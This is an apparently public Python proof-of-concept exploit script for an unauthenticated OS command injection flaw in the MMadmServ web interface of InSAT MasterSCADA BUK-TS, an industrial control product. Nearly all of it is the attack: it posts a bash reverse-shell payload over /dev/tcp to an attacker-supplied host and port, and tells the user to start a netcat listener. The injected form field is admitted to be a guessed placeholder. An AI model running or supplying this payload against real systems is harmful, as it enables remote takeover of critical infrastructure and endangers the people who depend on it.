#!/usr/bin/env python3 # Exploit Title: InSAT MasterSCADA BUK-TS MMadmServ OS Command Injection # CVE: CVE-2026-22553 # Date: 2026-05-14 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://insat.ru # Software Link: # Affected: InSAT MasterSCADA BUK-TS (All versions) # Tested on: # Category: Remote Code Execution # Platform: Linux # Exploit Type: OS Command Injection (CWE-78) # CVSS: 9.8 (Critical) # CWE : CWE-78 # Description: Unauthenticated OS Command Injection in MMadmServ web interface leading to RCE # Fixed in: Not fixed (No vendor response) # Usage: python3 exploit.py --lhost --lport # # Examples: # python3 exploit.py http://192.168.1.100:8080 --lhost 192.168.1.50 --lport 4444 # # Options: # --lhost Attacker IP for reverse shell # --lport Attacker port for reverse shell # # Notes: # This is a Proof of Concept for educational and authorized testing only. # Targeting critical infrastructure without permission is illegal. print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-22553 ║ ║ Target : InSAT MasterSCADA BUK-TS ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import sys import argparse def main(): parser = argparse.ArgumentParser(description="CVE-2026-22553 PoC") parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100:8080)") parser.add_argument("--lhost", required=True, help="Your IP for reverse shell") parser.add_argument("--lport", required=True, help="Your listening port") args = parser.parse_args() target = args.target.rstrip("/") lhost = args.lhost lport = args.lport # Reverse shell payload (bash) payload = f"; bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" print(f"[+] Target : {target}") print(f"[+] LHOST : {lhost}") print(f"[+] LPORT : {lport}") print(f"[+] Sending reverse shell payload...") # Common vulnerable field name (adjust if needed) data = {"command": f"test{payload}", "submit": "1"} # placeholder field try: r = requests.post(f"{target}/MMadmServ", data=data, timeout=8, verify=False) print(f"[+] Request sent | Status: {r.status_code}") print("[+] Check your listener (nc -lvnp " + lport + ")") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": main()